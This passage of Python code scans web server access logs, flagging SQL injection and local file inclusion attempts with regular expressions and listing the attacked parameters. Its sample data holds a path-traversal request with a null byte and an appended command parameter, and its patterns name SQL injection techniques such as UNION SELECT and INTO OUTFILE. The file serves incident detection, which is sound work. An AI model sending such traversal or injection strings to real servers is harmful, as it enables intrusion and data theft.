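    '192.168.221.130 - - [11/Jan/2012:15:08:00 +0000] "GET /index.html?page=../../../../../../../../../tmp/test2.txt%00&c=ls HTTP/1.1" 200 1373',
    '192.168.221.130 - - [11/Jan/2012:15:05:10 +0000] "GET /index.html?page=blog&id=2 HTTP/1.1" 200 900',
]
LOG_RE = re.compile(r'\[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) HTTP/[\d.]+"')
SQLI_RE = re.compile(r"\bUNION\b.*\bSELECT\b|\bINTO\s+OUTFILE\b|\bAND\s+\d+=\d+\b", re.I)
TRAVERSAL_RE = re.compile(r"(\.\./){2,}")


def classify_param(value):
    """'sqli', 'lfi' or None for one URL-decoded parameter value."""
    if "\x00" in value or TRAVERSAL_RE.search(value):
        return "lfi"              # traversal or a null byte to cut off an appended extension
    if SQLI_RE.search(value):
        return "sqli"
    return None


def scan_access_log(lines):
    """[(timestamp, parameter, kind)] for every hostile parameter value, oldest first."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            kind = classify_param(value)
            if kind:
                hits.append((m.group("ts"), name, kind))
    return sorted(hits, key=lambda h: datetime.strptime(h[0], "%d/%b/%Y:%H:%M:%S %z"))


def attacked_parameters(lines):
    """Distinct vulnerable parameters in the order they were first attacked."""
    seen = []
    for _ts, name, _kind in scan_access_log(lines):
        if name not in seen:
            seen.append(name)
    return seen
```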